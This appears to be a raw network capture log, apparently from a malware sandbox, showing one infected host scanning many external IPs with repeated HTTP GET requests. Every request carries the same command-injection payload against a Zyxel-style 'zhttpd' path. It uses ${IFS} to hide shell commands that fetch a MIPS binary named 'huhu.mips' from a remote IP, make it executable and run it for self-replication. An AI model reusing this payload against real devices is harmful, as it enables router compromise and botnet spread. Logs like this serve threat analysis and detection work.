                                                  Jan 19, 2024 18:24:01.173088074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5827192.168.2.1355042138.77.224.215443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.173121929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5828192.168.2.134654865.70.21.188443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.173144102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5829192.168.2.1344478199.71.118.80443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.173207045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5830192.168.2.1353450179.58.66.205443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.173254013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5831192.168.2.1347422140.197.1.209443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.173306942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5832192.168.2.1358466193.179.123.49443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.173362017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5833192.168.2.1338304110.19.111.59443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.173401117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5834192.168.2.135896868.195.151.223443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.173435926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5835192.168.2.1334180221.63.73.111443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.173484087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5836192.168.2.133408862.205.44.173443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.173517942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5837192.168.2.134684413.103.153.15443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.173568964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5838192.168.2.135817831.121.248.144443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.173610926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5839192.168.2.1349926198.86.248.112443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.173675060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5840192.168.2.1338456146.32.114.221443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.173695087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5841192.168.2.134614269.186.58.52443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.173731089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5842192.168.2.135653027.155.21.122443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.173783064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5843192.168.2.1339858134.18.25.174443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.173831940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5844192.168.2.1336566207.45.65.248443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.173865080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5845192.168.2.133859450.221.4.51443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.173911095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5846192.168.2.1348448201.46.229.45443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.173965931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5847192.168.2.136038476.133.241.224443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.173985004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5848192.168.2.133569012.209.247.0443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.174057007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5849192.168.2.1338764202.102.161.125443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.177602053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5850192.168.2.1358852173.15.0.121443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.177630901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5851192.168.2.1351696184.144.99.96443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.177664042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5852192.168.2.135568289.173.119.159443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.177714109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5853192.168.2.1354784180.222.185.162443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.177747965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5854192.168.2.135939617.125.239.37443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.177788019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5855192.168.2.1356290125.89.30.84443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.177839041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5856192.168.2.1339580179.26.190.76443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.177877903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5857192.168.2.134608091.244.166.252443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.177901983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5858192.168.2.133593474.152.115.36443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.186173916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5859192.168.2.1353324150.171.43.148443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.186225891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5860192.168.2.135688018.59.118.122443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.186252117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5861192.168.2.135774679.181.242.34443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.186335087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5862192.168.2.133980876.93.154.208443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.186371088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5863192.168.2.1346430186.142.100.229443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.186415911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5864192.168.2.1348644202.92.36.74443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.186444044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5865192.168.2.135537898.211.172.16443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.186486006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5866192.168.2.13608622.23.31.107443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.186543941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5867192.168.2.1346718104.10.37.217443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.186583996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5868192.168.2.135205819.13.87.208443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.186620951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5869192.168.2.133927888.27.91.254443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.186675072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5870192.168.2.1337606100.231.233.227443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.186734915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5871192.168.2.134667840.33.164.251443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.186757088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5872192.168.2.134185890.38.244.32443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.186834097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5873192.168.2.1358880181.44.162.221443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.186856985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5874192.168.2.1339064158.51.52.137443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.186906099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5875192.168.2.135175232.21.178.182443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.186928988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5876192.168.2.133564439.124.8.123443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.186985016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5877192.168.2.1335194124.172.225.55443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.187031031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5878192.168.2.1344302145.32.247.9443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.187083006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5879192.168.2.1354852176.224.255.89443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.187129974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5880192.168.2.1349636120.109.221.18443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.187172890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5881192.168.2.1334014220.154.246.166443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.187210083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5882192.168.2.1359734179.77.63.52443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.187264919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5883192.168.2.1360102193.151.60.46443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.187297106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5884192.168.2.134601864.208.175.193443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.187325001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5885192.168.2.133719437.85.206.31443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.187381983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5886192.168.2.1337780178.26.39.24443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.187424898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5887192.168.2.133938685.143.33.249443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.187479019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5888192.168.2.135905479.91.128.135443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.187525988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5889192.168.2.1349302107.221.128.217443
                                                  TimestampBytes transferredDirectionData
